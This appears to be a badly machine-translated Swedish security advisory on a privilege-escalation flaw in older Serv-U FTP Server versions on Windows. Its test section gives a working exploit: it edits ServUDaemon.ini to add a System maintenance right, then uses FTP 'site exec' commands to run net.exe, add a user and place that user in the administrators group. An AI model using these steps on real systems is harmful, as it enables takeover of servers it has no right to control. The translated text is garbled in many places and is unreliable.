Lokala förhöjd behörighet: Ja
Remote förhöjd behörighet: Ja
Använd förutsättningar: Serv-U profil på ett ändrat rättigheterna
Varning: Detta är bara ett privilegium upptrappning idéer och metoder.
1, de berörda programvara
Serv-U FTP Server 4.1.0.9 (och alla tidigare versioner)
För det andra, den drabbade datorn
Alla versioner av Microsoft Windows Server 2003
Alla versioner av Microsoft Windows XP
Alla versioner av Microsoft Windows 2000
Alla versioner av Microsoft Windows NT
Tredje, granska
Serv-U FTP Server till RhinoSoft fram en Ftp Sserver programvara, nu allmänt används runt om i världen. Efter att jag hittade, Serv-U FTP Server konfigurationsfil lagras i Serv-U FTP Server filkatalog ServUDaemon.ini fil. Om den lokala begränsade användaren eller en avlägsen angripare som har ett allmänt tillstånd för att få tillgång till handlingarna och noggrant arkivera innehållet i strukturen ServUDaemon.ini Ftp processen kan använda systemet för att exekvera godtyckliga kommandon med SYSTEM privilegier.
4, defekt analys:
Serv-U FTP Servera kommer att ställa den information som användaren sparas konfigurationen och senare ServUDaemon.ini fil. Inklusive användarens rätt till information och att få tillgång till nummerupplysning. Lokala begränsad användare eller en fjärrangripare att läsa och skriva så länge som Serv-U FTP Servera filen, kan du ändra filer i katalogen ServUDaemon.ini Ftp processen för genomförandet av fjärrkontrollen, det lokala systemet administratörsbehörighet till FTP exekvera godtyckliga kommandon. System version och inte omfattas av påverkan. (Användarinformation Välj "lagring och systemregistret" utan denna påverkas defekt)
5, testmetod:
1, den lokala testet
Antag att en lokalt begränsad användare kan bläddra i Serv-U FTP Servera filen katalogen. Hitta ServUDaemon.ini fil. Använd Anteckningar för att öppna den allmänna innehållet i det ursprungliga dokumentet som:
[Global]
Version = 4.1.0.0 / / Serv-U FTP server versionsnummer
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMÄNER]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 fil / / värd IP adress och domännamn, hamnförhållandena
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Lösenord = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c: / / kan bläddra i katalogen
Timeout = 600
Access1 = C: | RWAMLCDP
Om ServUDaemon.in fil ändras enligt följande:
[Global]
Version = 4.1.0.0
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMÄNER]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Lösenord = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c:
Timeout = 600
Underhåll = System file / / Behörigheter typ
Access1 = C: | RWAMELCDP
Ovanstående mer än det ursprungliga innehållet för en "Underhåll = System" spara efter redigering. Använd sedan FTP till Serv-U FTP Server efter genomförandet av följande kommando:
ftp open ip
Ansluten till ip.
220 Serv-U FTP Server v4.1.0.0 för WinSock redo ...
Användare (ip: (none)): id-fil / / användare insatsstruktur
331 Användarnamn okej, skicka hela e-postadress som lösenord.
Lösenord: lösenord fil / / lösenord
230 användare loggat in, gå vidare.
ftp cd winnt fil / / i win2k den winnt katalogen, om det är winxp eller Windows Server 2003 bör vara Windows-katalogen.
250 Katalog ändrats till / WINNT
ftp cd system32 filen / / i System32-katalogen
250 Katalog ändrats till / WINNT/system32
ftp citerar webbplats exec net.exe ziHUAN användare zihuan / lägga filen / / använda system net.exe filer plus användaren.
200 EXEC kommandot lyckas (TID = 33).
ftp citerar webbplats exec net.exe localhost administratörer zihuan / lägga filen / / uppgradera till superanvändare
Denna ökning i det lokala systemet, ett lösenord för zihuan: ziHUAN super user. Kan också direkt citera sajt exec net.exe localhost administratörer user / add kommandot aktuell användare att uppgradera till den super användargrupp för att gå. Naturligtvis kan du köra något kommando i systemet.
Uttalande:
Böcker endast beskriva de eventuella säkerhetsproblem, författaren och hackare Arkiv X tidningen här säkerhetsbulletinen är inte att ge någon garanti eller ett löfte. Eftersom spridningen av användningen av informationen i denna artikel, ett resultat av direkta eller indirekta konsekvenser av den förlust av användaren själv är ansvarig, påtar sig det författaren inte något ansvar for detta. Författarna har reviderat denna säkerhetsbulletin och tolkning. För den här artikeln, reproduceras eller överföras, för att säkerställa integriteten för denna artikel, inklusive meddelande om upphovsrätt och allt annat innehåll. Tillåtet utan upphovsmannens får inte modifiera eller ändra något av innehållet i denna artikel meddelande.